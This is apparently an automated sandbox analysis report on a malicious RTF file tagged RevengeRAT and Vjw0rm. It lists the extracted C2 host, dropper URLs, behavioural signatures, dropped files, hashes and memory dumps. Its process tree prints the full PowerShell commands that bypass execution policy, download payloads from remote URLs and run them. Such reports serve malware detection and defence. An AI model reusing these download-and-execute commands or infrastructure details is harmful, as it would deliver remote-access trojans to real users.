revengerat | 3fcab0addd17f497cf4a7bd90ca5797520a26d98d8fd87b3df5f539cf8cf41bb

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
29-07-2024 21:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6122d96e83f0c0dad6d1ed8ab22c60b3_JaffaCakes118.rtf
Size

429KB
MD5

6122d96e83f0c0dad6d1ed8ab22c60b3
SHA1

1c9fb09da9a5673b2c821657d1d50440eac79ed6
SHA256

3fcab0addd17f497cf4a7bd90ca5797520a26d98d8fd87b3df5f539cf8cf41bb
SHA512

943086f85de1d466dffb9e9ce1b4ae4ec18139373a4be92fcbc5e91b3e9edb38fbbcc5b3d9c1522af124870f1db9e750f52b2acc9093c4dde518fc9f2de86560
SSDEEP

3072:qxmwANc/nIwANc/nbwANc/nUwANc/nTwANc/nYwANc/ntwANc/n19F:sA29A2cA2ZA20A2NA2+A2nF

Score

10^/10

revengerat vjw0rm kerolyn s2 discovery execution stealer trojan worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://storage.googleapis.com/wzukusers/user-34654398/documents/5c8fc8d91e717XQDt0y4/ServidorFUDIGOR

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://storage.googleapis.com/wzukusers/user-34654398/documents/5c8fcdc868cf8Nau4eqD/2019

Extracted

Family

revengerat

Botnet

KEROLYN S2

bozok1.duckdns.org:333

Mutex

RV_MUTEX-iNSnIELecwCkj

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4984	1132	cmd.exe	86
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2888	1132	cmd.exe	86

RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat
Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
trojan worm vjw0rm

RevengeRat Executable 1 IoCs

stealer

resource	yara_rule
behavioral2/memory/1944-111-0x0000000000D50000-0x0000000000D58000-memory.dmp	revengerat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
32	3220	powershell.exe
33	1844	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1844	powershell.exe
3220	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation	taskgen.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.js	WScript.exe

Executes dropped EXE 2 IoCs

pid	Process
1944	taskgen.exe
1744	System32.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4984	cmd.exe
2888	cmd.exe
3764	PING.EXE
2920	PING.EXE

Checks processor information in registry 2 TTPs 13 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskgen.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0	taskgen.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	System32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0	System32.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Kills process with taskkill 4 IoCs

evasion

pid	Process
2332	taskkill.exe
2312	taskkill.exe
4460	taskkill.exe
2408	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings	powershell.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2920	PING.EXE
3764	PING.EXE

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
2908	WINWORD.EXE
2908	WINWORD.EXE
3848	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
1844	powershell.exe
1844	powershell.exe
1844	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	2312	taskkill.exe
Token: SeDebugPrivilege	2332	taskkill.exe
Token: SeDebugPrivilege	2408	taskkill.exe
Token: SeDebugPrivilege	4460	taskkill.exe
Token: SeDebugPrivilege	3220	powershell.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeDebugPrivilege	1944	taskgen.exe
Token: SeDebugPrivilege	1744	System32.exe

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
2908	WINWORD.EXE
2908	WINWORD.EXE
2908	WINWORD.EXE
1132	EXCEL.EXE
1132	EXCEL.EXE
1132	EXCEL.EXE
1132	EXCEL.EXE
3848	EXCEL.EXE
3848	EXCEL.EXE
3848	EXCEL.EXE
3848	EXCEL.EXE

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 1132 wrote to memory of 4984	1132	EXCEL.EXE	90
PID 1132 wrote to memory of 4984	1132	EXCEL.EXE	90
PID 1132 wrote to memory of 2888	1132	EXCEL.EXE	91
PID 1132 wrote to memory of 2888	1132	EXCEL.EXE	91
PID 4984 wrote to memory of 2332	4984	cmd.exe	94
PID 4984 wrote to memory of 2332	4984	cmd.exe	94
PID 2888 wrote to memory of 2312	2888	cmd.exe	95
PID 2888 wrote to memory of 2312	2888	cmd.exe	95
PID 2888 wrote to memory of 4460	2888	cmd.exe	96
PID 2888 wrote to memory of 4460	2888	cmd.exe	96
PID 4984 wrote to memory of 2408	4984	cmd.exe	97
PID 4984 wrote to memory of 2408	4984	cmd.exe	97
PID 2888 wrote to memory of 2920	2888	cmd.exe	99
PID 2888 wrote to memory of 2920	2888	cmd.exe	99
PID 4984 wrote to memory of 3764	4984	cmd.exe	100
PID 4984 wrote to memory of 3764	4984	cmd.exe	100
PID 4984 wrote to memory of 1844	4984	cmd.exe	104
PID 4984 wrote to memory of 1844	4984	cmd.exe	104
PID 2888 wrote to memory of 3220	2888	cmd.exe	105
PID 2888 wrote to memory of 3220	2888	cmd.exe	105
PID 3220 wrote to memory of 3832	3220	powershell.exe	108
PID 3220 wrote to memory of 3832	3220	powershell.exe	108
PID 1844 wrote to memory of 1944	1844	powershell.exe	109
PID 1844 wrote to memory of 1944	1844	powershell.exe	109
PID 1944 wrote to memory of 1744	1944	taskgen.exe	117
PID 1944 wrote to memory of 1744	1944	taskgen.exe	117

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6122d96e83f0c0dad6d1ed8ab22c60b3_JaffaCakes118.rtf" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2908

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im excel.exe & taskkill /f /im winword.exe & ping -n 3 localhost & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://storage.googleapis.com/wzukusers/user-34654398/documents/5c8fc8d91e717XQDt0y4/ServidorFUDIGOR','%TEMP%\taskgen.exe');Start-Process '%TEMP%\taskgen.exe'
  2⤵
  - Process spawned unexpected child process
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:4984
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im excel.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2332
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im winword.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2408
- - C:\Windows\system32\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3764
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://storage.googleapis.com/wzukusers/user-34654398/documents/5c8fc8d91e717XQDt0y4/ServidorFUDIGOR','C:\Users\Admin\AppData\Local\Temp\taskgen.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\taskgen.exe'
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1844
  - - C:\Users\Admin\AppData\Local\Temp\taskgen.exe
      "C:\Users\Admin\AppData\Local\Temp\taskgen.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Checks processor information in registry
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1944
    - - C:\Users\Admin\AppData\Roaming\System32.exe
        
        "C:\Users\Admin\AppData\Roaming\System32.exe"
        5⤵
        Executes dropped EXE
        Checks processor information in registry
        Suspicious use of AdjustPrivilegeToken
        
        PID:1744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im excel.exe & taskkill /f /im winword.exe & ping -n 3 localhost & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://storage.googleapis.com/wzukusers/user-34654398/documents/5c8fcdc868cf8Nau4eqD/2019','%PUBLIC%\.js');Start-Process '%PUBLIC%\.js'
  2⤵
  - Process spawned unexpected child process
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:2888
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im excel.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2312
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im winword.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4460
- - C:\Windows\system32\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2920
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://storage.googleapis.com/wzukusers/user-34654398/documents/5c8fcdc868cf8Nau4eqD/2019','C:\Users\Public\.js');Start-Process 'C:\Users\Public\.js'
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3220
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\.js"
      4⤵
      Drops startup file
      PID:3832

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\AA96995E-D020-49E7-A8F6-5438A0E3C14B

Filesize
169KB

MD5
3ceee6fd9bc96eac078517c4ecf3d509

SHA1
c9b9b0263e239759e577d99c3271b0260fc39be0

SHA256
0c0186a4a5183166719d58b6b9e8226b7c758959c872a11b2f57f24a6538fdda

SHA512
f0e0dc826ae27da027f7c953dd623c533c98d3cc78e8b31fb770657cdc6221443e1b658f131cf6913fd623e895a27171eab5e6a11cbf61dfffce6bb23594f12a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

Filesize
2KB

MD5
712710d37d05df2ba0a5d095f51a8623

SHA1
cadb5d0b8ae90ef9cce644ec509e01eb97dc8fc7

SHA256
f8e2c3ca7d2e5345227eef638cb86e92c5b84a9334b34422e24b56e276c08d91

SHA512
597c99eb52d61e83ac1a67fa5687e30a1a5c58dd6311e9a7393fd5011678f28354c04fa739694e30fe254397d349805c1e769acabafae926145d284db104ca20

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

Filesize
2KB

MD5
de76a9d3669262aeb89b9911d3857fd0

SHA1
fcc412549653e69eec798799fcfa460331176db3

SHA256
dfd8cae6daebf61f58de9a19a0cd948b28ed40344e2a69cebe9c2f1088dca61f

SHA512
6a5b89a98447ce82b1de981d44fbabde711c5adcb120583f3141ead5c54e94977f71851b74f55498b2e0ca549dfa23317e619bd9a29bc78eb6b6e12e6a8e085e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
70595b5937369a2592a524db67e208d3

SHA1
d989b934d9388104189f365694e794835aa6f52f

SHA256
be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8

SHA512
edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rq0x3k4z.ypv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskgen.exe

Filesize
361KB

MD5
694088b55e8ccd704bd01ce37123d577

SHA1
c256d312404df3aef089d957a44e48030decc139

SHA256
0869024a8e1c8d1c12ecedccf9e32ae4702436859c1befa1507075e97362ec6f

SHA512
4f458f607472a232b04eb20356ac2bde275c208823aea5b54688bd74dde6c85c6fae735f1fe254b3ae114120bca383124f93fcd7d33be6cace4486158eca4ed0

Download Submit
C:\Users\Public\.js

Filesize
9KB

MD5
a9a9d84ef5f6c850be17e5c3ace9e324

SHA1
b91bae1c10f8340e89c6a795f3fc389cba4ef336

SHA256
b2ce5348dc6f2d43013ff0c5776070ad920eb5ce4a0ad2587deda6b50f31b6ab

SHA512
f4eea6e32c0ab50fa052c18548a72272c19d71eebd42a2d5fc634ba5cf325fd20ee717f43d228cff6f3bd5a6ad6c5bde34925c6252a0d8e3869ae1bf101c25ae

Download Submit
memory/1132-37-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/1132-35-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/1132-59-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/1132-41-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/1132-40-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/1132-38-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/1132-39-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/1944-113-0x000000001BFD0000-0x000000001C032000-memory.dmp

Filesize
392KB

Download
memory/1944-112-0x000000001BA90000-0x000000001BF5E000-memory.dmp

Filesize
4.8MB

Download
memory/1944-111-0x0000000000D50000-0x0000000000D58000-memory.dmp

Filesize
32KB

Download
memory/1944-110-0x000000001B430000-0x000000001B4D6000-memory.dmp

Filesize
664KB

Download
memory/2908-19-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/2908-4-0x00007FFEE0B30000-0x00007FFEE0B40000-memory.dmp

Filesize
64KB

Download
memory/2908-15-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/2908-8-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/2908-18-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/2908-0-0x00007FFEE0B30000-0x00007FFEE0B40000-memory.dmp

Filesize
64KB

Download
memory/2908-12-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/2908-20-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/2908-21-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/2908-22-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/2908-11-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/2908-6-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/2908-17-0x00007FFEDE5B0000-0x00007FFEDE5C0000-memory.dmp

Filesize
64KB

Download
memory/2908-65-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/2908-7-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/2908-16-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/2908-10-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/2908-5-0x00007FFF20B4D000-0x00007FFF20B4E000-memory.dmp

Filesize
4KB

Download
memory/2908-1-0x00007FFEE0B30000-0x00007FFEE0B40000-memory.dmp

Filesize
64KB

Download
memory/2908-2-0x00007FFEE0B30000-0x00007FFEE0B40000-memory.dmp

Filesize
64KB

Download
memory/2908-3-0x00007FFEE0B30000-0x00007FFEE0B40000-memory.dmp

Filesize
64KB

Download
memory/2908-14-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/2908-9-0x00007FFF20AB0000-0x00007FFF20CA5000-memory.dmp

Filesize
2.0MB

Download
memory/2908-13-0x00007FFEDE5B0000-0x00007FFEDE5C0000-memory.dmp

Filesize
64KB

Download
memory/3220-74-0x000001C63D510000-0x000001C63D532000-memory.dmp

Filesize
136KB

Download
memory/3848-136-0x00007FFEE0B30000-0x00007FFEE0B40000-memory.dmp

Filesize
64KB

Download
memory/3848-138-0x00007FFEE0B30000-0x00007FFEE0B40000-memory.dmp

Filesize
64KB

Download
memory/3848-139-0x00007FFEE0B30000-0x00007FFEE0B40000-memory.dmp

Filesize
64KB

Download
memory/3848-137-0x00007FFEE0B30000-0x00007FFEE0B40000-memory.dmp

Filesize
64KB

Download